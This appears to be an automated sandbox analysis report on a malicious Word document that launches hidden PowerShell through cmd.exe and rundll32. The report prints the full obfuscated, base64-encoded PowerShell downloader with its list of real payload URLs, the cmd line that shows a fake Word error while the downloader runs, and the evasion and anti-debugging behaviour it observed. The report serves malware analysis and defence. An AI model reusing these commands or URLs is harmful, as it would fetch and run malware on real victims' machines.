Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2368 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 00000008.00000002.2095025221.000000000048D000.00000004.00000020.sdmp Binary or memory string: VMware_S
Source: powershell.exe, 00000005.00000002.2089981727.0000000000434000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00403278 mov eax, dword ptr fs:[00000030h] 7_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002327EC mov eax, dword ptr fs:[00000030h] 7_2_002327EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00873278 mov eax, dword ptr fs:[00000030h] 8_2_00873278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002227EC mov eax, dword ptr fs:[00000030h] 8_2_002227EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E27EC mov eax, dword ptr fs:[00000030h] 9_2_001E27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00283278 mov eax, dword ptr fs:[00000030h] 10_2_00283278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002027EC mov eax, dword ptr fs:[00000030h] 10_2_002027EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_003727EC mov eax, dword ptr fs:[00000030h] 11_2_003727EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002327EC mov eax, dword ptr fs:[00000030h] 12_2_002327EC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.55.186.229 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"( Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdADgANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQB0ACAAIABEAGIATgBNACAAKABbAFQAWQBQAGUAXQAoACIAewA0AH0AewA1AH0AewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAEYAIAAnAHkAJwAsACcAUgAnACwAJwBvACcALAAnAEkAUgBlAGMAdAAnACwAJwBzAHkAJwAsACcAUwB0AGUAbQAuAGkAbwAuAGQAJwApACAAKQA7ACAAIABTAFYAIAAgADAAagBBACAAKABbAHQAeQBwAEUAXQAoACIAewAwAH0AewA2AH0AewA1AH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewAzAH0AIgAgAC0ARgAgACcAUwB5AHMAdABFACcALAAnAEEATgBBACcALAAnAFMARQBSAHYAJwAsACcARwBlAFIAJwAsACcATwBJAG4AdABtACcALAAnAFQALgAnACwAJwBtAC4AbgBFACcALAAnAEkAYwBlAHAAJwApACAAKQAgACAAOwAgACQATwByAGIAXwBjAGgAMgA9ACQATQA0ADEAQgAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQARwAwADgAQwA7ACQARQA1ADAATgA9ACgAKAAnAEEAJwArACcANQA1ACcAKQArACcAWAAnACkAOwAgACAAKAAgAGwAcwAgACAAdgBBAHIASQBBAEIAbABlADoAZABCAE4AbQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBDAFIAYABFAGEAYABUAGUAZABJAHIAZQBjAGAAVABgAG8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAJwBkACcAKwAnADAAJwArACgAJwBDAGgAYQAxACcAKwAnAF8ANQAnACsAJwBqAEIAZAAwACcAKwAnAFAAJwApACsAKAAnAHoAJwArACcAeQByACcAKQArACcAeAB5ACcAKwAoACcAdgBCAGQAJwArACcAMAAnACkAKQAuACIAUgBlAGAAUABMAGEAYABDAGUAIgAoACgAWwBjAEgAYQByAF0ANgA2ACsAWwBjAEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAAr